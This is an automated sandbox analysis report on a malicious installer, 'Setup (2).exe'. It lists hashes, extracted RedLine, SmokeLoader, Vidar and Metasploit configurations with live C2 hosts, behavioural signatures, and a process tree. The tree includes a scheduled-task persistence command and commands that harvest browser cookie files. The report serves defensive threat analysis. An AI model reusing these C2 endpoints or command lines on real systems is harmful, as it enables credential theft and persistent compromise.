Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    208s
  • max time network
    658s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (2).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 34 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2632
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2624
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2376
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2336
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1824
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1260
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1236
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1064
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                          PID:964
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                            2⤵
                              PID:9248
                              • C:\Windows\SysWOW64\schtasks.exe
                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                3⤵
                                • Creates scheduled task(s)
                                PID:936
                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              2⤵
                                PID:6988
                              • C:\Users\Admin\AppData\Roaming\brtwjas
                                C:\Users\Admin\AppData\Roaming\brtwjas
                                2⤵
                                  PID:1152
                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  2⤵
                                    PID:7516
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                  1⤵
                                    PID:1008
                                  • C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
                                    "C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Modifies system certificate store
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of WriteProcessMemory
                                    PID:3156
                                    • C:\Users\Admin\Documents\3JWAxQwgEy0h48daeUDYdMmc.exe
                                      "C:\Users\Admin\Documents\3JWAxQwgEy0h48daeUDYdMmc.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious use of WriteProcessMemory
                                      PID:1400
                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4276
                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4320
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:3116
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4692
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5908
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5676
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 4320 -s 1284
                                          4⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:5420
                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4256
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4840
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:5768
                                      • C:\Users\Admin\Documents\tbBxRuuj3xSQj1IRwS5Ziv4x.exe
                                        "C:\Users\Admin\Documents\tbBxRuuj3xSQj1IRwS5Ziv4x.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:440
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 660
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4452
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 676
                                          3⤵
                                          • Program crash
                                          PID:4004
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 684
                                          3⤵
                                          • Program crash
                                          PID:2976
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 700
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4876
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 1120
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3856
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 1160
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2976
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 1112
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:4716
                                      • C:\Users\Admin\Documents\Yayu6cHPazZgR6sCc3M5fBSp.exe
                                        "C:\Users\Admin\Documents\Yayu6cHPazZgR6sCc3M5fBSp.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2364
                                      • C:\Users\Admin\Documents\2XPi6vwXGhvZqtEFX6fdxsXJ.exe
                                        "C:\Users\Admin\Documents\2XPi6vwXGhvZqtEFX6fdxsXJ.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3148
                                      • C:\Users\Admin\Documents\zU_N7uusG1kQVxEiAgVdgDyZ.exe
                                        "C:\Users\Admin\Documents\zU_N7uusG1kQVxEiAgVdgDyZ.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2156
                                        • C:\Users\Admin\Documents\zU_N7uusG1kQVxEiAgVdgDyZ.exe
                                          C:\Users\Admin\Documents\zU_N7uusG1kQVxEiAgVdgDyZ.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4632
                                      • C:\Users\Admin\Documents\p5Nt5WkXlyvDFA42AkUmcjoN.exe
                                        "C:\Users\Admin\Documents\p5Nt5WkXlyvDFA42AkUmcjoN.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1908
                                      • C:\Users\Admin\Documents\Cm6JrZvzkXvujIsJs30ftxgl.exe
                                        "C:\Users\Admin\Documents\Cm6JrZvzkXvujIsJs30ftxgl.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3076
                                      • C:\Users\Admin\Documents\GiYQC8PEAf0HbkhPhwu3gCGd.exe
                                        "C:\Users\Admin\Documents\GiYQC8PEAf0HbkhPhwu3gCGd.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3888
                                      • C:\Users\Admin\Documents\786SSe3GWC5ui54XaxYk7Bqw.exe
                                        "C:\Users\Admin\Documents\786SSe3GWC5ui54XaxYk7Bqw.exe"
                                        2⤵
                                          PID:3336
                                          • C:\Users\Admin\Documents\786SSe3GWC5ui54XaxYk7Bqw.exe
                                            C:\Users\Admin\Documents\786SSe3GWC5ui54XaxYk7Bqw.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4832
                                          • C:\Users\Admin\Documents\786SSe3GWC5ui54XaxYk7Bqw.exe
                                            C:\Users\Admin\Documents\786SSe3GWC5ui54XaxYk7Bqw.exe
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4604
                                        • C:\Users\Admin\Documents\RL3h4yWZG7TrM5a8gdjZs6MV.exe
                                          "C:\Users\Admin\Documents\RL3h4yWZG7TrM5a8gdjZs6MV.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1644
                                          • C:\Users\Admin\Documents\RL3h4yWZG7TrM5a8gdjZs6MV.exe
                                            "C:\Users\Admin\Documents\RL3h4yWZG7TrM5a8gdjZs6MV.exe" -q
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4944
                                        • C:\Users\Admin\Documents\3WhATblc_yaOnhp5rrQg4Am8.exe
                                          "C:\Users\Admin\Documents\3WhATblc_yaOnhp5rrQg4Am8.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:432
                                        • C:\Users\Admin\Documents\qIFOwSNDD8UjZOa2rVZ6Rvde.exe
                                          "C:\Users\Admin\Documents\qIFOwSNDD8UjZOa2rVZ6Rvde.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1892
                                          • C:\Users\Admin\Documents\qIFOwSNDD8UjZOa2rVZ6Rvde.exe
                                            "C:\Users\Admin\Documents\qIFOwSNDD8UjZOa2rVZ6Rvde.exe"
                                            3⤵
                                              PID:4976
                                          • C:\Users\Admin\Documents\GlwpKsEVirlyltJC5BBEbNmq.exe
                                            "C:\Users\Admin\Documents\GlwpKsEVirlyltJC5BBEbNmq.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3980
                                          • C:\Users\Admin\Documents\XOGekQzYhFYluqDULKasVJbi.exe
                                            "C:\Users\Admin\Documents\XOGekQzYhFYluqDULKasVJbi.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3892
                                          • C:\Users\Admin\Documents\gf3e8DKRSAdc9ahP98g_h49O.exe
                                            "C:\Users\Admin\Documents\gf3e8DKRSAdc9ahP98g_h49O.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:2304
                                            • C:\Users\Admin\Documents\gf3e8DKRSAdc9ahP98g_h49O.exe
                                              C:\Users\Admin\Documents\gf3e8DKRSAdc9ahP98g_h49O.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4624
                                          • C:\Users\Admin\Documents\6345X82frFRSfLSAy56g4jqM.exe
                                            "C:\Users\Admin\Documents\6345X82frFRSfLSAy56g4jqM.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3104
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 760
                                              3⤵
                                              • Program crash
                                              PID:2680
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 812
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4872
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 784
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4516
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 796
                                              3⤵
                                              • Program crash
                                              PID:5268
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 956
                                              3⤵
                                              • Program crash
                                              PID:5784
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1008
                                              3⤵
                                              • Program crash
                                              PID:6116
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1072
                                              3⤵
                                              • Program crash
                                              PID:5352
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1344
                                              3⤵
                                              • Program crash
                                              PID:5796
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1376
                                              3⤵
                                              • Program crash
                                              PID:6096
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1412
                                              3⤵
                                              • Program crash
                                              PID:524
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1440
                                              3⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:6304
                                          • C:\Users\Admin\Documents\FfR5qCM3T3LG7v1ovCB4iziN.exe
                                            "C:\Users\Admin\Documents\FfR5qCM3T3LG7v1ovCB4iziN.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:1432
                                          • C:\Users\Admin\Documents\ZQ38gg0nKTCOwkEXb1Pp0FEu.exe
                                            "C:\Users\Admin\Documents\ZQ38gg0nKTCOwkEXb1Pp0FEu.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1348
                                            • C:\Users\Admin\AppData\Roaming\3528019.exe
                                              "C:\Users\Admin\AppData\Roaming\3528019.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4232
                                            • C:\Users\Admin\AppData\Roaming\4923928.exe
                                              "C:\Users\Admin\AppData\Roaming\4923928.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:4772
                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5100
                                          • C:\Users\Admin\Documents\BZfS4je8mWQ4hAWL2vD_D6Q5.exe
                                            "C:\Users\Admin\Documents\BZfS4je8mWQ4hAWL2vD_D6Q5.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4648
                                            • C:\Users\Admin\AppData\Local\Temp\is-HSJ4R.tmp\BZfS4je8mWQ4hAWL2vD_D6Q5.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-HSJ4R.tmp\BZfS4je8mWQ4hAWL2vD_D6Q5.tmp" /SL5="$70116,138429,56832,C:\Users\Admin\Documents\BZfS4je8mWQ4hAWL2vD_D6Q5.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of FindShellTrayWindow
                                              PID:4760
                                              • C:\Users\Admin\AppData\Local\Temp\is-20VPA.tmp\Setup.exe
                                                "C:\Users\Admin\AppData\Local\Temp\is-20VPA.tmp\Setup.exe" /Verysilent
                                                4⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4004
                                                • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                  "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:4252
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 768
                                                    6⤵
                                                    • Program crash
                                                    PID:6188
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 812
                                                    6⤵
                                                    • Program crash
                                                    PID:6792
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 784
                                                    6⤵
                                                    • Program crash
                                                    PID:7060
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 780
                                                    6⤵
                                                    • Program crash
                                                    PID:6160
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 956
                                                    6⤵
                                                    • Program crash
                                                    PID:6588
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 984
                                                    6⤵
                                                    • Program crash
                                                    PID:5016
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1048
                                                    6⤵
                                                    • Program crash
                                                    PID:2612
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1360
                                                    6⤵
                                                    • Program crash
                                                    PID:7740
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1332
                                                    6⤵
                                                    • Program crash
                                                    PID:8136
                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Enumerates connected drives
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:3428
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274922 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                    6⤵
                                                    • Blocklisted process makes network request
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Drops file in Program Files directory
                                                    PID:6044
                                                • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                  "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4732
                                                  • C:\Users\Admin\AppData\Local\Temp\is-75FDV.tmp\WEATHER Manager.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-75FDV.tmp\WEATHER Manager.tmp" /SL5="$1030E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                    6⤵
                                                      PID:4436
                                                      • C:\Users\Admin\AppData\Local\Temp\is-A84N6.tmp\Setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-A84N6.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Enumerates connected drives
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:5480
                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-A84N6.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-A84N6.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274922 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                          8⤵
                                                            PID:6184
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:4612
                                                      • C:\Users\Admin\AppData\Local\Temp\is-7DJ64.tmp\VPN.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-7DJ64.tmp\VPN.tmp" /SL5="$10316,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4560
                                                        • C:\Users\Admin\AppData\Local\Temp\is-R64RD.tmp\Setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-R64RD.tmp\Setup.exe" /silent /subid=720
                                                          7⤵
                                                            PID:6868
                                                            • C:\Users\Admin\AppData\Local\Temp\is-48HAE.tmp\Setup.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-48HAE.tmp\Setup.tmp" /SL5="$30262,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-R64RD.tmp\Setup.exe" /silent /subid=720
                                                              8⤵
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Modifies system certificate store
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:6376
